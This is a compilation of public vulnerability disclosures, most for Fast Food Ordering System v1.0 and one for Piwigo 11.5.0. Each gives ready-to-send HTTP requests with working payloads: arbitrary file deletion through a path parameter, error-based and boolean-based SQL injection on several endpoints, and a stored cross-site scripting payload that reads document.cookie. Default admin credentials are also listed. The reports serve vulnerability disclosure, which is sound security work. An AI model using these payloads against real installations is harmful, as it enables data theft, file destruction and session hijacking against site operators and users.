Fast Food Ordering System v1.0 is vulnerable to Delete any file. via /ffos/classes/Master.php?f=delete_img.

**Fast Food Ordering System v1.0 by oretnom23 has Delete any file**

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/classes/Master.php?f=delete\_img

Vulnerability location: /ffos/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shell.php file in the root directory

POST /ffos/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/ffos/admin/?page=system\_info
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
path=C%3A%2Fxampp%2Fhtdocs%2Fffos%2Fshell.php

The file path needs to be encoded by url

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the root directory of the website

The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists.

By this time, shell.php has been deleted.

CVE-2022-32328: bug_report/delet-file-1.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/classes/Master.php?f=delete_menu.

Permalink

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/classes/Master.php?f=delete\_menu

Vulnerability location: /ffos/classes/Master.php?f=delete\_menu, id

dbname = ffos\_db

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ffos/classes/Master.php?f\=delete\_menu HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ffos/admin/?page=menus
Content-Length: 65
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-32330: bug_report/SQLi-2.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/admin/categories/view_category.php?id=.

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/admin/categories/view\_category.php?id=

Vulnerability location: /ffos/admin/categories/view\_category.php?id=, id

Current database name: ffos\_db,length is 7

\[+\] Payload: /ffos/admin/categories/view\_category.php?id=6%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /ffos/admin/categories/view\_category.php?id\=6%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close

When length (database ()) = 6, Content-Length: 839 

When length (database ()) = 7, Content-Length: 737

CVE-2022-32331: bug_report/SQLi-4.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/classes/Master.php?f=delete_category.

Permalink

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/classes/Master.php?f=delete\_category

Vulnerability location: /ffos/classes/Master.php?f=delete\_category, id

dbname = ffos\_db

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ffos/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ffos/admin/?page=categories
Content-Length: 65
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-32332: bug_report/SQLi-1.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/admin/categories/manage_category.php?id=.

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/admin/categories/manage\_category.php?id=

Vulnerability location: /ffos/admin/categories/manage\_category.php?id=, id

Current database name: ffos\_db,length is 7

\[+\] Payload: /ffos/admin/categories/manage\_category.php?id=6%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /ffos/admin/categories/manage\_category.php?id\=6%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close

When length (database ()) = 6, Content-Length: 2421 

When length (database ()) = 7, Content-Length: 2561

CVE-2022-32334: bug_report/SQLi-5.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/admin/menus/manage_menu.php?id=.

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/admin/menus/manage\_menu.php?id=

Vulnerability location: /ffos/admin/menus/manage\_menu.php?id=, id

Current database name: ffos\_db,length is 7

\[+\] Payload: /ffos/admin/menus/manage\_menu.php?id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /ffos/admin/menus/manage\_menu.php?id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close

When length (database ()) = 6, Content-Length: 3743 

When length (database ()) = 7, Content-Length: 3908

CVE-2022-32335: bug_report/SQLi-7.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/admin/sales/receipt.php?id=.

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/admin/sales/receipt.php?id=

Vulnerability location: /ffos/admin/sales/receipt.php?id=, id

Current database name: ffos\_db,length is 7

\[+\] Payload: /ffos/admin/sales/receipt.php?id=10%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /ffos/admin/sales/receipt.php?id\=10%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close

When length (database ()) = 6, Content-Length: 7417 

When length (database ()) = 7, Content-Length: 8389

CVE-2022-32333: bug_report/SQLi-3.md at main · k0xx11/bug_report

Fast Food Ordering System v1.0 is vulnerable to SQL Injection via /ffos/admin/menus/view_menu.php?id=.

**Fast Food Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html

Vulnerability File: /ffos/admin/menus/view\_menu.php?id=

Vulnerability location: /ffos/admin/menus/view\_menu.php?id=, id

Current database name: ffos\_db,length is 7

\[+\] Payload: /ffos/admin/menus/view\_menu.php?id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /ffos/admin/menus/view\_menu.php?id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=rlr2a917ahfp4mc52mm9a7kvvm
Connection: close

When length (database ()) = 6, Content-Length: 1015 

When length (database ()) = 7, Content-Length: 950

CVE-2022-32336: bug_report/SQLi-6.md at main · k0xx11/bug_report

In Piwigo 11.5.0, there exists a persistent cross-site scripting in the single mode function through /admin.php?page=batch_manager&mode=unit.

**Description:**  
In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting  
**Vulnerable Instances:**  
/admin.php?page=batch\_manager&mode=unit  
  
**affected source code file**  

**request**

    POST /admin.php?page=batch_manager&mode=unit HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 152
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/admin.php?page=batch_manager&mode=unit
    Cookie:  pwg_id=mof6jca30q9tr1qu48hhvqi143
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    element_ids=4&name-4=test&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11&date_creation-4=&level-4=0&description-4=&submit=Submit
    

**suggestion**  
Restrict user input and output

CVE-2021-40678: Persistent Cross Site Scripting in Batch Manager(version:11.5.0) · Issue #1476 · Piwigo/Piwigo

A Server-Side Request Forgery (SSRF) vulnerability in IPS Community Suite before 4.6.2 allows remote authenticated users to request arbitrary URLs or trigger deserialization via phar protocol when generating class names dynamically. In some cases an exploitation is possible by an unauthenticated user.

Tag

#firefox